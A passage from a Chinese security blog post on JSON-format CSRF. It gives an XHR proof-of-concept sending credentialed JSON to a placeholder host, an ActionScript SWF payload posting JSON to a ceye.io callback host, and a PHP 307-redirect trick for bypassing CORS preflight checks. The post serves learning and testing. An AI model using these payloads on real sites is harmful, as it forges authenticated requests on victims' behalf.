{&quot;app_key&quot;:&quot;*****&quot;,&quot;client_id&quot;:&quot;*****&quot;,&quot;summary&quot;:{&quot;sdk_api_version&quot;:&quot;2.0&quot;,&quot;sdk_version&quot;:&quot;4.24.0&quot;,&quot;OS&quot;:&quot;Mac OS&quot;,&quot;os_version&quot;:&quot;10.13&quot;,&quot;os_version_name&quot;:&quot;10.13&quot;,&quot;device_model&quot;:&quot;MacIntel&quot;,&quot;country&quot;:&quot;CN&quot;,&quot;language&quot;:&quot;zh&quot;,&quot;locale&quot;:&quot;zh_CN&quot;,&quot;display_height&quot;:728,&quot;display_width&quot;:1440,&quot;device_type&quot;:&quot;Mac&quot;,&quot;device_vendor&quot;:&quot;&quot;,&quot;url&quot;:&quot;*****&quot;,&quot;referrer&quot;:&quot;&quot;,&quot;browser&quot;:&quot;Firefox&quot;,&quot;browser_version&quot;:&quot;56.0&quot;,&quot;browser_version_name&quot;:&quot;56.0&quot;,&quot;browser_engine&quot;:&quot;Gecko&quot;,&quot;source&quot;:&quot;&quot;},&quot;custom&quot;:{},&quot;test&quot;:&quot;=test&quot;}

</code></pre><p>返回200</p>
<h4 id="服务器查找json格式的数据并验证Content-type，即application-json"><a href="#服务器查找json格式的数据并验证Content-type，即application-json" class="headerlink" title="服务器查找json格式的数据并验证Content-type，即application/json"></a>服务器查找json格式的数据并验证Content-type，即application/json</h4><p>但在校验Content-type的情况下，这个时候上述方法就行不不通了。这个时候可以用ajax来自定义数据头，XHRHTTPREQUEST修改Content-Type,改成application/json</p>
<pre><code>&lt;html&gt;
  &lt;body&gt;
    &lt;script&gt;
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open(&quot;POST&quot;, &quot;http://www.xxx.com/webnet/edit&quot;, true);
        xhr.setRequestHeader(&quot;Accept&quot;, &quot;*/*&quot;);
        xhr.setRequestHeader(&quot;Accept-Language&quot;, &quot;zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3&quot;);
        xhr.setRequestHeader(&quot;Content-Type&quot;, &quot;application/json; charset=utf-8&quot;);
        xhr.withCredentials = true;
        xhr.send(JSON.stringify({&quot;pSpotId&quot;:&quot;120201&quot;,&quot;pSignTimes&quot;:&quot;70&quot;,&quot;pModuleID&quot;:&quot;207&quot;,&quot;pSceneid&quot;:&quot;120201007000046&quot;}));
    }
    &lt;/script&gt;
    &lt;form action=&quot;#&quot;&gt;
      &lt;input type=&quot;button&quot; value=&quot;Submit request&quot; onclick=&quot;submitRequest();&quot;/&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;
</code></pre><p>但是这个有个缺陷，使用xmlhttprequest的时候，会先发一个OPTIONS请求预检(非简单请求的CORS请求，会在正式通信之前，增加一次HTTP查询请求，称为”预检”请求,即浏览器先询问服务器，当前网页所在的域名是否在服务器的许可名单之中，以及可以使用哪些HTTP动词和头信息字段。只有得到肯定答复，浏览器才会发出正式的XMLHttpRequest请求，否则就报错)，在使用XHR的时候空域状态下会有跨域限制。这里涉及到cors跨域限制的问题，详情可以看看<br>‘<a href="https://my.oschina.net/hccake/blog/886602&#39;" target="_blank" rel="noopener">https://my.oschina.net/hccake/blog/886602&#39;</a></p>
<p>预检请求：</p>
<pre><code>OPTIONS /get_flags_async HTTP/1.1
Host: experiment.appadhoc.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
Origin: null
Connection: close

</code></pre><p>其中如果浏览器否定了”预检”请求，会返回一个正常的HTTP回应，但是没有任何CORS相关的头信息字段。这时，浏览器就会认定，服务器不同意预检请求，因此触发一个错误，被XMLHttpRequest对象的onerror回调函数捕获。控制台会打印出如下的报错信息。<br>报错：</p>
<pre><code>Access to XMLHttpRequest at &#39;https://experiment.appadhoc.com/get_flags_async&#39; from origin &#39;null&#39; has been blocked by CORS policy: Response to preflight request doesn&#39;t pass access control check: The value of the &#39;Access-Control-Allow-Origin&#39; header in the response must not be the wildcard &#39;*&#39; when the request&#39;s credentials mode is &#39;include&#39;. The credentials mode of requests initiated by the XMLHttpRequest is controlled by the withCredentials attribute.
</code></pre><p>服务器设置允许任意域名跨域请求与可携带cookie进行了冲突，这个问题是后端配置的问题<br>（axios默认是发送请求的时候不会带上cookie的，需要通过设置withCredentials: true来解决。 这个时候需要注意需要后端配合设置实际的origin，不能为* ）</p>
<p>遇到cors跨域请求不通过的时候flash　+ 307 跳转就可以派上用场了。</p>
<h5 id="flash-307-即SWF-JSON-CSRF-待补充"><a href="#flash-307-即SWF-JSON-CSRF-待补充" class="headerlink" title="flash + 307 即SWF_JSON_CSRF-待补充"></a>flash + 307 即SWF_JSON_CSRF-待补充</h5><p>参考 <a href="https://github.com/sp1d3r/swf_json_csrf" target="_blank" rel="noopener">https://github.com/sp1d3r/swf_json_csrf</a> </p>
<ul>
<li><p>as编辑swf文件<br>编辑修改swf文件这里我用的是ffdec<br>构造payload如下<br><code>`</code><br>package<br>{<br> import flash.display.Sprite;<br> import flash.net.URLLoader;<br> import flash.net.URLRequest;<br> import flash.net.URLRequestHeader;<br> import flash.net.URLRequestMethod;</p>
<p> public class re extends Sprite<br> {</p>
</li>
</ul>
<pre><code>  public function re()
  {
     var member1:Object = null;
     var myJson:String = null;
     Wonderfl.capture(stage);
     super();
     Wonderfl.capture(stage);
     member1 = new Object();
     member1 = {
        &quot;name&quot;:&quot;attacker&quot;,
        &quot;email&quot;:&quot;attacker@gmail.com&quot;
     };
     var myData:Object = member1;
     myJson = JSON.stringify(myData);
     myJson = JSON.stringify(myData);
     var url:String = &quot;http://xxxxx.ceye.io&quot;;
     var request:URLRequest = new URLRequest(url);
     request.requestHeaders.push(new URLRequestHeader(&quot;Content-Type&quot;,&quot;application/json&quot;));
     request.data = myJson;
     request.method = URLRequestMethod.POST;
     var urlLoader:URLLoader = new URLLoader();
     try
     {
        urlLoader.load(request);
        return;
     }
     catch(e:Error)
     {
        trace(e);
        return;
     }
  }
</code></pre><p>   }<br>}</p>
<pre><code>- php307 跳转

由于307跳转会带上原有的数据格式和类型，所以使用307跳转

如：
</code></pre><p>&lt;?php</p>
<p>// redirect automatically</p>
<p>header(“Location: <a href="https://xx.xxx.xx/xx&quot;" target="_blank" rel="noopener">https://xx.xxx.xx/xx&quot;</a>, true, 307);</p>
<p>?&gt;</p>
<pre><code># 参考
</code></pre><p><a href="http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-February/007533.html" target="_blank" rel="noopener">http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-February/007533.html</a><br><a href="https://my.oschina.net/hccake/blog/886602" target="_blank" rel="noopener">https://my.oschina.net/hccake/blog/886602</a><br><a href="https://www.freebuf.com/articles/web/164234.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/164234.html</a><br><a href="https://www.cnblogs.com/blacksunny/p/7930126.html" target="_blank" rel="noopener">https://www.cnblogs.com/blacksunny/p/7930126.html</a><br><a href="http://www.geekboy.ninja/blog/exploiting-json-cross-site-request-forgery-csrf-using-flash/" target="_blank" rel="noopener">http://www.geekboy.ninja/blog/exploiting-json-cross-site-request-forgery-csrf-using-flash/</a><br><a href="https://github.com/sp1d3r/swf_json_csrf" target="_blank" rel="noopener">https://github.com/sp1d3r/swf_json_csrf</a><br><a href="https://github.com/bottlepy/bottle/issues/616" target="_blank" rel="noopener">https://github.com/bottlepy/bottle/issues/616</a><br><a href="https://www.leavesongs.com/HTML/sina-jsonp-hijacking-csrf-worm.html" target="_blank" rel="noopener">https://www.leavesongs.com/HTML/sina-jsonp-hijacking-csrf-worm.html</a><br><a href="https://www.csdn.net/article/2015-07-14/2825207" target="_blank" rel="noopener">https://www.csdn.net/article/2015-07-14/2825207</a><br><a href="https://book.2cto.com/201310/34316.html" target="_blank" rel="noopener">https://book.2cto.com/201310/34316.html</a><br><a href="http://blog.knownsec.com/2014/06/flashupload_csrf_attacking/" target="_blank" rel="noopener">http://blog.knownsec.com/2014/06/flashupload_csrf_attacking/</a><br><a href="http://cm2.pw/" target="_blank" rel="noopener">http://cm2.pw/</a><br><code>`</code></p>
<h1 id="补充"><a href="#补充" class="headerlink" title="补充"></a>补充</h1><h2 id="CORS与JSONP的区别-待补充"><a href="#CORS与JSONP的区别-待补充" class="headerlink" title="CORS与JSONP的区别-待补充"></a>CORS与JSONP的区别-待补充</h2><p>JSONP只支持GET请求，CORS支持所有类型的HTTP请求。JSONP的优势在于支持老式浏览器，以及可以向不支持CORS的网站请求数据。</p>

    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>原文作者：<a href="https://blog.th3wind.xyz">th3wind</a>
            <p>原文链接：<a href="https://blog.th3wind.xyz/posts/799045951/">https://blog.th3wind.xyz/posts/799045951/</a>
            <p>发表日期：<a href="https://blog.th3wind.xyz/posts/799045951/">July 21st 2019, 12:44:08 pm</a>
            <p>更新日期：<a href="https://blog.th3wind.xyz/posts/799045951/">July 21st 2019, 12:44:08 pm</a>
            <p>版权声明：本文采用<a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href= "/posts/441860727/" title= "fastjson 反序列化（二）">
                    <div class="nextTitle">fastjson 反序列化（二）</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/posts/1832779944/" title= "DOM XSS从javascript中输出数据到HTML页面">
                    <div class="prevTitle">DOM XSS从javascript中输出数据到HTML页面</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:1119225754@qq.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/blackjliuyun" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
            
                <span class="iconfont-archer wechat" title=wechat>
                  
                  <img class="profile-qr" src="/assets/example_qr.png" />
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#json与jsonp的学习与分析"><span class="toc-number">1.</span> <span class="toc-text">json与jsonp的学习与分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#json和jsonp的区别"><span class="toc-number">1.1.</span> <span class="toc-text">json和jsonp的区别</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#jsonp-简介"><span class="toc-number">1.2.</span> <span class="toc-text">jsonp 简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#jsonp-风险"><span class="toc-number">1.3.</span> <span class="toc-text">jsonp 风险</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#jsonp劫持"><span class="toc-number">1.3.1.</span> <span class="toc-text">jsonp劫持</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#利用条件"><span class="toc-number">1.3.1.1.</span> <span class="toc-text">利用条件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#利用方式"><span class="toc-number">1.3.1.2.</span> <span class="toc-text">利用方式</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#防范措施"><span class="toc-number">1.3.1.3.</span> <span class="toc-text">防范措施</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#callback可自定义导致的安全问题-典型案例"><span class="toc-number">1.3.2.</span> <span class="toc-text">callback可自定义导致的安全问题 典型案例</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Content-Type与XSS漏洞"><span class="toc-number">1.3.2.1.</span> <span class="toc-text">Content-Type与XSS漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#利用条件-1"><span class="toc-number">1.3.2.1.1.</span> <span class="toc-text">利用条件</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#利用方式-1"><span class="toc-number">1.3.2.1.2.</span> <span class="toc-text">利用方式</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#防范"><span class="toc-number">1.3.2.1.3.</span> <span class="toc-text">防范</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#MHTML与JSONP"><span class="toc-number">1.3.3.</span> <span class="toc-text">MHTML与JSONP</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#FLASH与JSONP"><span class="toc-number">1.3.4.</span> <span class="toc-text">FLASH与JSONP</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#FLASH的调用及域"><span class="toc-number">1.3.4.0.1.</span> <span class="toc-text">FLASH的调用及域</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#利用思路"><span class="toc-number">1.3.4.0.2.</span> <span class="toc-text">利用思路</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#利用验证"><span class="toc-number">1.3.4.0.3.</span> <span class="toc-text">利用验证</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#利用环境"><span class="toc-number">1.3.4.0.3.1.</span> <span class="toc-text">利用环境</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#利用JSONP进行水坑攻击"><span class="toc-number">1.3.5.</span> <span class="toc-text">利用JSONP进行水坑攻击</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#JSON风险"><span class="toc-number">1.4.</span> <span class="toc-text">JSON风险</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#JSON格式的CSRF"><span class="toc-number">1.4.1.</span> <span class="toc-text">JSON格式的CSRF</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#服务器查找json格式的数据但不验证Content-type"><span class="toc-number">1.4.1.1.</span> <span class="toc-text">服务器查找json格式的数据但不验证Content-type</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#服务器查找json格式的数据并验证Content-type，即application-json"><span class="toc-number">1.4.1.2.</span> <span class="toc-text">服务器查找json格式的数据并验证Content-type，即application/json</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#flash-307-即SWF-JSON-CSRF-待补充"><span class="toc-number">1.4.1.2.1.</span> <span class="toc-text">flash + 307 即SWF_JSON_CSRF-待补充</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#补充"><span class="toc-number">2.</span> <span class="toc-text">补充</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#CORS与JSONP的区别-待补充"><span class="toc-number">2.1.</span> <span class="toc-text">CORS与JSONP的区别-待补充</span></a></li></ol></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 19
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2020 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">01/13</span><a class="archive-post-title" href= "/posts/2306483136/" >jackson反序列化漏洞_1</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">01/13</span><a class="archive-post-title" href= "/posts/238052750/" >java反弹shell</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/13</span><a class="archive-post-title" href= "/posts/4232223630/" >java sql注入</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/08</span><a class="archive-post-title" href= "/posts/1199978306/" >Apache Solr CVE-2019-0193 复现与学习</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/28</span><a class="archive-post-title" href= "/posts/441860727/" >fastjson 反序列化（二）</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> Invalid date </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">Invalid date</span><a class="archive-post-title" href= "/posts/799045951/" >json与jsonp的学习与分析</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/21</span><a class="archive-post-title" href= "/posts/1832779944/" >DOM XSS从javascript中输出数据到HTML页面</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/18</span><a class="archive-post-title" href= "/posts/1479992369/" >fastjson 1.2.47 rce</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/11</span><a class="archive-post-title" href= "/posts/3083871992/" >计划任务</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/08</span><a class="archive-post-title" href= "/posts/384491153/" >XXE实例及应用3</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> Invalid date </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">Invalid date</span><a class="archive-post-title" href= "/posts/0/" >[Untitled Post]</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/14</span><a class="archive-post-title" href= "/posts/577137578/" >ETH 漏洞复现</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">01/28</span><a class="archive-post-title" href= "/posts/608224058/" >XXE 示例及利用-java—SDK-1</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">01/22</span><a class="archive-post-title" href= "/posts/3609640977/" >frida理解与学习</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">01/10</span><a class="archive-post-title" href= "/posts/1469573512/" >安全策略-csp理解与学习</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">01/01</span><a class="archive-post-title" href= "/posts/3327493404/" >2019</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2018 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/24</span><a class="archive-post-title" href= "/posts/4121068354/" >XXE 示例及利用</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/02</span><a class="archive-post-title" href= "/posts/3586992485/" >编码绕过xss</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/23</span><a class="archive-post-title" href= "/posts/1899165956/" >BCH分叉-重放攻击解决方案</a>
        </li>
    
    </div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="生活"><span class="iconfont-archer">&#xe606;</span>生活</span>
    
        <span class="sidebar-tag-name" data-tags="规划"><span class="iconfont-archer">&#xe606;</span>规划</span>
    
        <span class="sidebar-tag-name" data-tags="区块链安全"><span class="iconfont-archer">&#xe606;</span>区块链安全</span>
    
        <span class="sidebar-tag-name" data-tags="Web安全"><span class="iconfont-archer">&#xe606;</span>Web安全</span>
    
        <span class="sidebar-tag-name" data-tags="XSS"><span class="iconfont-archer">&#xe606;</span>XSS</span>
    
        <span class="sidebar-tag-name" data-tags="Web渗透"><span class="iconfont-archer">&#xe606;</span>Web渗透</span>
    
        <span class="sidebar-tag-name" data-tags="常规渗透"><span class="iconfont-archer">&#xe606;</span>常规渗透</span>
    
        <span class="sidebar-tag-name" data-tags="浏览器安全策略"><span class="iconfont-archer">&#xe606;</span>浏览器安全策略</span>
    
        <span class="sidebar-tag-name" data-tags="内网渗透"><span class="iconfont-archer">&#xe606;</span>内网渗透</span>
    
        <span class="sidebar-tag-name" data-tags="计划任务"><span class="iconfont-archer">&#xe606;</span>计划任务</span>
    
        <span class="sidebar-tag-name" data-tags="移动端"><span class="iconfont-archer">&#xe606;</span>移动端</span>
    
        <span class="sidebar-tag-name" data-tags="frida"><span class="iconfont-archer">&#xe606;</span>frida</span>
    
        <span class="sidebar-tag-name" data-tags="XXE 实例利用"><span class="iconfont-archer">&#xe606;</span>XXE 实例利用</span>
    
        <span class="sidebar-tag-name" data-tags="漏洞学习"><span class="iconfont-archer">&#xe606;</span>漏洞学习</span>
    
        <span class="sidebar-tag-name" data-tags="XXE"><span class="iconfont-archer">&#xe606;</span>XXE</span>
    
        <span class="sidebar-tag-name" data-tags="web 渗透"><span class="iconfont-archer">&#xe606;</span>web 渗透</span>
    
        <span class="sidebar-tag-name" data-tags="java反序列化"><span class="iconfont-archer">&#xe606;</span>java反序列化</span>
    
        <span class="sidebar-tag-name" data-tags="jackson"><span class="iconfont-archer">&#xe606;</span>jackson</span>
    
        <span class="sidebar-tag-name" data-tags="java sql注入"><span class="iconfont-archer">&#xe606;</span>java sql注入</span>
    
        <span class="sidebar-tag-name" data-tags="java反弹shell"><span class="iconfont-archer">&#xe606;</span>java反弹shell</span>
    
        <span class="sidebar-tag-name" data-tags="fastjson"><span class="iconfont-archer">&#xe606;</span>fastjson</span>
    
        <span class="sidebar-tag-name" data-tags="Apache Solr CVE-2019-0193"><span class="iconfont-archer">&#xe606;</span>Apache Solr CVE-2019-0193</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br/>
    1、请确保node版本大于6.2<br/>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br/>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br/>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
        <span class="sidebar-category-name" data-categories="区块链安全"><span class="iconfont-archer">&#xe60a;</span>区块链安全</span>
    
        <span class="sidebar-category-name" data-categories="Web安全"><span class="iconfont-archer">&#xe60a;</span>Web安全</span>
    
        <span class="sidebar-category-name" data-categories="Web渗透"><span class="iconfont-archer">&#xe60a;</span>Web渗透</span>
    
        <span class="sidebar-category-name" data-categories="浏览器安全策略"><span class="iconfont-archer">&#xe60a;</span>浏览器安全策略</span>
    
        <span class="sidebar-category-name" data-categories="Web安全/XSS"><span class="iconfont-archer">&#xe60a;</span>Web安全/XSS</span>
    
        <span class="sidebar-category-name" data-categories="内网渗透"><span class="iconfont-archer">&#xe60a;</span>内网渗透</span>
    
        <span class="sidebar-category-name" data-categories="Web渗透/常规渗透"><span class="iconfont-archer">&#xe60a;</span>Web渗透/常规渗透</span>
    
        <span class="sidebar-category-name" data-categories="浏览器安全策略/csp"><span class="iconfont-archer">&#xe60a;</span>浏览器安全策略/csp</span>
    
        <span class="sidebar-category-name" data-categories="Web渗透/安全策略"><span class="iconfont-archer">&#xe60a;</span>Web渗透/安全策略</span>
    
        <span class="sidebar-category-name" data-categories="内网渗透/计划任务"><span class="iconfont-archer">&#xe60a;</span>内网渗透/计划任务</span>
    
        <span class="sidebar-category-name" data-categories="Web渗透/常规渗透/XSS"><span class="iconfont-archer">&#xe60a;</span>Web渗透/常规渗透/XSS</span>
    
        <span class="sidebar-category-name" data-categories="Web渗透/漏洞学习"><span class="iconfont-archer">&#xe60a;</span>Web渗透/漏洞学习</span>
    
        <span class="sidebar-category-name" data-categories="web-渗透"><span class="iconfont-archer">&#xe60a;</span>web-渗透</span>
    
        <span class="sidebar-category-name" data-categories="web-渗透/java反序列化"><span class="iconfont-archer">&#xe60a;</span>web-渗透/java反序列化</span>
    
        <span class="sidebar-category-name" data-categories="web-渗透/java反序列化/jackson"><span class="iconfont-archer">&#xe60a;</span>web-渗透/java反序列化/jackson</span>
    
        <span class="sidebar-category-name" data-categories="web-渗透/java反序列化/java-sql注入"><span class="iconfont-archer">&#xe60a;</span>web-渗透/java反序列化/java-sql注入</span>
    
        <span class="sidebar-category-name" data-categories="web-渗透/java反序列化/java反弹shell"><span class="iconfont-archer">&#xe60a;</span>web-渗透/java反序列化/java反弹shell</span>
    
        <span class="sidebar-category-name" data-categories="web-渗透/漏洞学习"><span class="iconfont-archer">&#xe60a;</span>web-渗透/漏洞学习</span>
    
        <span class="sidebar-category-name" data-categories="web-渗透/漏洞学习/fastjson"><span class="iconfont-archer">&#xe60a;</span>web-渗透/漏洞学习/fastjson</span>
    
        <span class="sidebar-category-name" data-categories="web-渗透/漏洞学习/Apache-Solr-CVE-2019-0193"><span class="iconfont-archer">&#xe60a;</span>web-渗透/漏洞学习/Apache-Solr-CVE-2019-0193</span>
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "th3wind"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


